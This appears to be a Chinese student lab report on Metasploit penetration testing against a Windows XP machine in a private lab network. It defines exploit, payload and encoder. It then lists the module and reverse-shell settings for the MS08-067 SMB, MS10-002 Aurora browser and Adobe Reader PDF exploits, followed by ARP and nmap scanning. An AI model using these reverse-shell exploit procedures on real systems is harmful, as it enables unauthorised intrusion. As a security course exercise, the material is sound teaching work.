一、基础知识回答
- 用自己的话解释什么是exploit,payload,encode
- exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步
- payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情
-
encode:编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现
二、实践过程
-
1.Windows服务渗透攻击——MS08-067安全漏洞
- MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
- 我们利用这个模块进行主动攻击。
-
调用该模块,并且查看可以使用的payload
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
设置payload,tcp反向回连set LHOST 192.168.53.131
攻击机kali ipset LPORT 4306
攻击端口set RHOST 192.168.53.132
靶机winxp ipset target 0
自动选择目标系统类型,匹配度较高show options
看一下配置是否都正确exploit
开始监听。-
成功获取win xp的系统权限
2.2 MS10_002_aurora漏洞攻击
- ms10_002台风漏洞是IE浏览器漏洞,也是黑客挂马利用的最热门漏洞。
msf > use windows/browser/ms10_002_aurora
调用该模块set payload windows/meterpreter/reverse_http
设置http反向回连- 依旧是设置攻击机ip、攻击端口
set URIPATH 4306zss
设置统一资源标识符路径- 开始监听
- 成功生成一个URL
http://192.168.53.131:8080/4306zss
- 在win xp的IE浏览器中访问该地址,显示空白(要关掉xp上的杀毒软件)
- 回头来看kali这边已经攻击成功了(见上上一张图),
ipconfig
试一下
2.3 针对Adobe的攻击
use exploit/mulit/fileformat/adobe_u3d_meshcont
选用该模块,但是好像用不了use exploit/windows/fileformat/adobe_toolbutton
换一个模块set payload windows/meterpreter/reverse_tcp
设置tcp反向回连show options
查看要设置哪些东西- 根据要求设置好了,然后开始监听
- 接下来就要和之前左后门实验一样,把刚刚生成的pdf文件(在指定的路径里面找到)放到xp上,各种设置回连监听啥的
- 然后在xp上用Adobe Reader打开pdf
- kali这边攻击成功,一样的
ipconfig
2.4 辅助模块应用
-
- 我选了arp_sweep模块,这是一个可以扫描端口、各种连接等等的模块
- 进入该模块
set interface eth0
,set RHOSTS 192.168.53.132
设置靶机ip,set threads 2
run
开启扫描,成功地扫描到靶机nmap 192.168.53.132
开启nmap扫描,可以看见开启的端口号,以及靶机的操作系统